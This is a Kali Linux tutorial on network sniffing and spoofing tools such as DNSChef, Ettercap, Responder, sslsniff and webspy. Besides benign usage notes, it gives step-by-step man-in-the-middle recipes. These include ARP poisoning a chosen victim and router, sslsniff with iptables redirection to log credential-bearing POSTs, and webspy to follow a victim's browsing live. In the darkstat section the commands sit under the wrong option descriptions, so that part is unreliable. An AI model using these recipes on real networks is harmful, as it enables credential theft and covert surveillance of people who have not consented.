What Is Sniffing ?A packet sniffer is a utility that has been used since the original release of Ethernet. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues and by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.
They refer to listening to a conversation. For example, if you login to a website that uses no encryption, your username and password can be sniffed off the network by someone who can capture the network traffic between you and the web site.
Network Spoofing can be done using following tool:
DarkstatDarkstat is a simple, web based network traffic analyzer application. It works on many popular operating systems like Linux, Solaris, Mac and AIX. It keeps running in the background as a daemon and continues collecting and sniffing network data and presents it in easily understandable format within its web interface. It can generate traffic reports for hosts, identify which ports are open on some particular host and is IPV 6 complaint application. Let’s see how we can install and configure it on Linux operating system.
As previously mentioned, "darkstat" provides several options, which can be simply be provided during the startup. Those parameters are:
With option "-i" you can specify which interface is monitored.
darkstat -i eth1
In order to bind a certain port to a specific interface, you can use the option "-b". In the following example to the local loopback address:darkstat -p 8080
Persistent DNS-Resolution can be prevented by the parameter "-n". This may be good for people without a flatrate or a dedicated line.darkstat -b 127.0.0.1
Use option "-P" to prevent "darkstat" from putting the interface into "promiscuous mode". However, this is not recommendable, because "darkstat" only captures and analyzes the packets, which are addressed to the MAC of the monitored network interface. All other packages are rejected.darkstat -n
Parameter "-l" activates correctly "SNAT"-behavior in the local network. "SNAT" stands for "Source Network Address Translation" and means that your router masks the local IP address of the client with its own public. Thus he sends the inquiry representatively for the originally inquire client.darkstat -P
With parameter "-e" you can perform a packet filter expression.darkstat -l 192.168.1.0/255.255.255.0
From version 2.5 upwards you can detach "darkstat" from the starting terminal. Thus it works like a daemon.darkstat -e "port not 22"
Via parameter "-d" you can specify the directory where "darkstat" creates its database.darkstat --detach
Option "-v" activates the "verbose mode":darkstat -d /directory
If you are interested in the version number of "darkstat" or its full usage and syntax, try parameter "-h".darkstat -v
The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.
Intercept all responsesNow, that you know how to start DNSChef let's configure it to fake all replies to point to 127.0.0.1 using the --fakeip parameter:
# ./dnschef.py --fakeip 127.0.0.1 -q [*] DNSChef started on interface: 127.0.0.1 [*] Using the following nameservers: 220.127.116.11 [*] Cooking all A replies to point to 127.0.0.1 [23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1 [23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com [23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
Let's fake one more request to illustrate how to target multiple records at the same time:$ host google.com localhost
In addition to the --fakeip flag, I have now specified --fakeipv6 designed to fake 'AAAA' record queries. Here is an updated program output:# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
At last let's observe how the application handles queries of type ANY:
DNS ANY record queries results in DNSChef returning every faked record that it knows about for an applicable domain. Here is the output that the program will see:# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
$ host -t ANY google.com localhost
Filtering domainsUsing the above example, consider you only want to intercept requests for thesprawl.org and leave queries to all other domains such as webfaction.com without modification. You can use the --fakedomains parameter as illustrated below:
From the above example the request for thesprawl.org was faked; however, the request for mx9.webfaction.com was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest.# ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not.
Reverse filteringIn another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the --truedomains parameter as follows:
There are several things going on in the above example. First notice the use of a wildcard (). All domains matching .webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.# ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
NOTE: Wildcards are position specific. A mask of type .thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type .*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
DNSSpoofDnsSpoof forges replies to arbitrary DNS address / pointer queries on the internal LAN. This is useful in bypassing host name based access controls, or in implementing a variety of efficient network controls.
In a corperate network DnsSpoof can be used to efficiently point clients to internal machines instead on externally mounted ones. Or, it can be used to keep clients from going to certain host names that are not allowed by policy rules.
Ettercap-graphicalEttercap stands for Ethernet Capture.
Ettercap is a comprehensive suite for man in the middle attacks.
It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
Open Ettercap in graphical mode: # ettercap -G
Select the sniff mode: Sniff → Unified sniffing and Scan for host inside your subnet Hosts → Scan for hosts
See the MAC and IP addresses of the hosts inside your subnet: Hosts → Hosts List, from this list Select the machines to poison
We chose to ARP poison only the windows machine 192.168.1.2 and the router 192.168.1.1.
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
Highlight the line containing 192.168.1.2 and click on the "target 2" button.
Start the ARP poisoning: Mitm → Arp poisoning and start the sniffer to see the activities
hexinjectHexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access. It’s designed to work together with others command-line utilities, and for this reason it facilitates the creation of powerful shell scripts capable of reading, intercepting and modifying network traffic in a transparent manner.
hexinject -s -i eth0 -> sniffing eth0 interface
hexinject -s -i eth0 -r -> output in raw format
hexinject -s -i eth0 -r | strings -> using strings
hexinject -s -i eth0 -r | strings | Host -> filtering on hosts
echo 'abcd' | hexinject -p -i eth0 -r -> sending a custom string to the network
This will create a packet like this:
# msgsnarf -i eth0or you can filter specific hosts by a tcpdump filter expressionm
# msgsnarf -i eth0 host 10.0.0.2'-i': interface to listen or sniff on (for live connections)
If you add a 'p' tag and remove the '-i', you can read from a pcap capture file and parse that for conversation. This method is more for forensics purposes.
netsniff-ngnetsniff-ng is a free, performant Linux network analyzer and networking toolkit. If you will, the Swiss army knife for network packets. The gain of performance is reached by built-in zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space, and vice versa The netsniff-ng toolkit’s primary usage goal is to facilitate a network developer’s / hacker’s daily Linux plumbing. It can be used for network development, debugging, analysis, auditing or network reconnaissance.
Passive discoveryPassive discovery is an activity of looking and searching information about certain organization or a network.While Kali Linux has massive tools that we can utilize to do this, it might take us a lot of time in learning each tools.
To solve this problem, we can use discover scripts or previously known as backtrack scripts in our Kali Linux system.The framework was written by
Lee Baird .Discover script not only incorporate various kali tools but it is also easy to use.
ResponderThis tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix.
Specify the IP address to redirect to (-i 192.168.1.202), enabling the WPAD rogue proxy (-w On), answers for netbios wredir (-r On), and fingerprinting (-f On):
root@kali:~# responder -i 192.168.1.202 -w On -r On -f On
sslsniffsslsniff is designed to create man-in-the-middle (MITM) attacks for SSL/TLS connections, and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that is provided. sslsniff also supports other attacks like null-prefix or OCSP attacks to achieve silent interceptions of connections when possible.
Start the attackConnect both the Linux and Windows hosts to the network. Enable IP forwarding on the Linux host:
# echo 1 > /proc/sys/net/ipv4/ip_forwardConfigure iptables to re-route all TCP 443 requests to port 999 where sslsniff will be listening:
# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 999Start up sslsniff in targeted mode, listening on port 999, writing a log file, enabling OCSP declining, and logging only HTTP POST information where user credentials are wrapped up in.
# sslsniff -t -c /usr/share/sslsniff/certs/spoofed_site -s 999 -w /tmp/sslsniff.log -d -pBegin ARP poisoning. Assuming the Windows host has an IP address of 10.0.0.5 and the router's inside address is 10.0.0.1:
# arpspoof -i eth0 -t 10.0.0.5 10.0.0.1This will start an continuous ARP transmission from the attacker to the Windows host.
TCPflowTCPflow is a program that captures and stores or displays data transmitted on a TCP/IP network.TCPflow is a program that captures data transmitted as part of TCP connections (flows), and stores the data in an efficient way for protocol analysis or debugging. A program like "tcpdump" or "wireshark" shows a summary of packets seen on the wire, but usually does not store the data is actually being transmitted. In contrast, TCPflow reconstructed currents of thousands or millions of real data and stores each flow in a separate file for later analysis ..
TCPflow sequence numbers and interprets correctly reconstruct data streams regardless of retransmissions or out of the delivery. However, currently can not with IP fragments, flows containing IP fragments not be recorded correctly, or the headers 802.11
Suppose we need all the http traffic in the network,command tcpflow -ce host 192.168.0.100<your target here>
command: tcpflow -ce port 80
Command: tcpflow -ce host 192.168.0.100<your target> and port 80 or port 443.
Webspywebspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). Netscape must be running on your local X display ahead of time.
This is about how to sniff traffic on your local network and browse with the victim on the go. As the victim will browse through the web pages, the same will keep appearing on our local browser at Kali linux machine. The mechanism is simple. we will arp poison the victims after setting up IP forwarding on our kali linux machine.Then we will use webspy and ice weasel browser to track the victims browser.
The tutorial assumes that you have kali linux up and running.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100
webspy -i wlan0 192.168.1.101 (the victim ip address)
WiresharkWireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Capturing PacketsAfter downloading and installing Wireshark, you can launch it and click the name of an interface under Interface List to start capturing packets on that interface. For example, if you want to capture traffic on the wireless network, click your wireless interface. You can configure advanced features by clicking Capture Options, but this isn’t necessary for now.
As soon as you click the interface’s name, you’ll see the packets start to appear in real time. Wireshark captures each packet sent to or from your system. If you’re capturing on a wireless interface and have promiscuous mode enabled in your capture options, you’ll also see other the other packets on the network.
Click the stop capture button near the top left corner of the window when you want to stop capturing traffic.